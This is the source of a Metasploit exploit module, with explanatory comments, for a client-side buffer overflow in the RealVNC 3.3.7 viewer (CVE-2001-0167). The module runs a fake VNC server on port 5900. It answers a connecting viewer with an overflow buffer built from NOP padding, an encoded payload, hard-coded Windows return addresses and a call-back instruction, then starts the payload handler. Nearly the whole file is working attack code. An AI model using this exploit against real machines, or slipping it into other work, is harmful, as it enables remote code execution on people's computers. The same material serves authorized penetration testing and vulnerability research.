Path: blob/master/modules/exploits/windows/vnc/realvnc_client.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Client-side exploit module for the RealVNC 3.3.7 viewer (vncviewer.exe),
# tracked as CVE-2001-0167 / OSVDB 6281 / BID 2305 (disclosed 2001-01-29).
#
# Unlike a typical remote exploit, this module does not connect out to a
# victim: it runs a TCP *server* on SRVPORT (default 5900, the usual VNC port)
# and waits for a vulnerable viewer to connect to it. The overflow is delivered
# in the module's reply to the viewer's first data after the RFB version banner.
#
# From a defender's point of view the observable trigger is therefore an
# outbound connection from vncviewer.exe to an untrusted host, followed by an
# oversized reply (the exact byte count is logged by print_status below).
# Hosts still running RealVNC 3.3.7 remain exposed; the targets table lists
# only Windows 2000 SP4 / XP SP2 / 2003 SP1 (English) return addresses.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # TcpServer mixin: supplies the listening socket (`service`) and calls
  # on_client_connect / on_client_data for each connecting viewer.
  include Msf::Exploit::Remote::TcpServer

  # Registers module metadata (name, references, payload constraints, targets)
  # and the single user option SRVPORT.
  #
  # @param info [Hash] metadata merged into the framework's update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'RealVNC 3.3.7 Client Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2001-0167' ],
          [ 'OSVDB', '6281' ],
          [ 'BID', '2305' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        # Payload constraints: at most 500 encoded bytes, no NOP padding from
        # the encoder (MaxNops 0 — padding is done explicitly in on_client_data),
        # and the listed bytes must not appear in the encoded payload.
        'Payload' => {
          'Space' => 500,
          'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'MaxNops' => 0,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # One hard-coded return address per supported OS/service pack/locale;
        # `target.ret` is read in on_client_data.
        'Targets' => [
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x7c2ec68b } ],
          [ 'Windows XP SP2 English', { 'Ret' => 0x77dc15c0 } ],
          [ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2001-01-29',
        'DefaultTarget' => 0,
        # Reliability / stability / side effects are not characterised by the author.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # SRVPORT is the port the fake VNC server listens on; 5900 is VNC's
    # conventional display-0 port, which is what a viewer connects to by default.
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ]
    )
  end

  # Called by the TcpServer mixin when a viewer connects. Sends the RFB 3.3
  # protocol-version banner a real server would send, so the viewer proceeds
  # with the handshake and replies (which triggers on_client_data).
  #
  # @param client [Rex::Socket] the connected viewer socket
  def on_client_connect(client)
    rfb = "RFB 003.003\n"

    client.put(rfb)
  end

  # Called when the viewer sends any data after the banner. Builds the
  # overflow buffer, writes it to the viewer, starts the payload handler,
  # and closes the client. Nothing in this method inspects what the viewer
  # actually sent.
  #
  # @param client [Rex::Socket] the connected viewer socket
  def on_client_data(client)
    # Abort if the framework cannot produce a payload for this client.
    # NOTE(review): `p` is assigned but never read; the code below uses
    # payload.encoded instead — presumably regenerate_payload refreshes that
    # same object, confirm against the mixin before relying on it.
    return if ((p = regenerate_payload(client)) == nil)

    # Pad so that filler + encoded payload is exactly 993 bytes. Space is
    # capped at 500 in the metadata, so this length stays positive.
    filler = make_nops(993 - payload.encoded.length)

    # Buffer layout: fixed 8-byte prefix (its RFB meaning is not documented
    # here), NOP filler, payload, the target's return address little-endian,
    # 10 more NOPs, then a 0xe8 byte followed by a little-endian signed 32-bit
    # value (packed 'CV') — presumably an x86 near call with a negative
    # displacement back toward the buffer; confirm against the original analysis.
    sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
    sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
    # 200 bytes of trailing filler from the framework helper.
    sploit << rand_text_english(200)

    # The logged byte count is also the size a network sensor would see in
    # the server-to-viewer reply.
    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    # Start the payload handler, then drop the viewer connection; the viewer
    # is not kept alive after the overflow buffer has been sent.
    handler
    service.close_client(client)
  end
end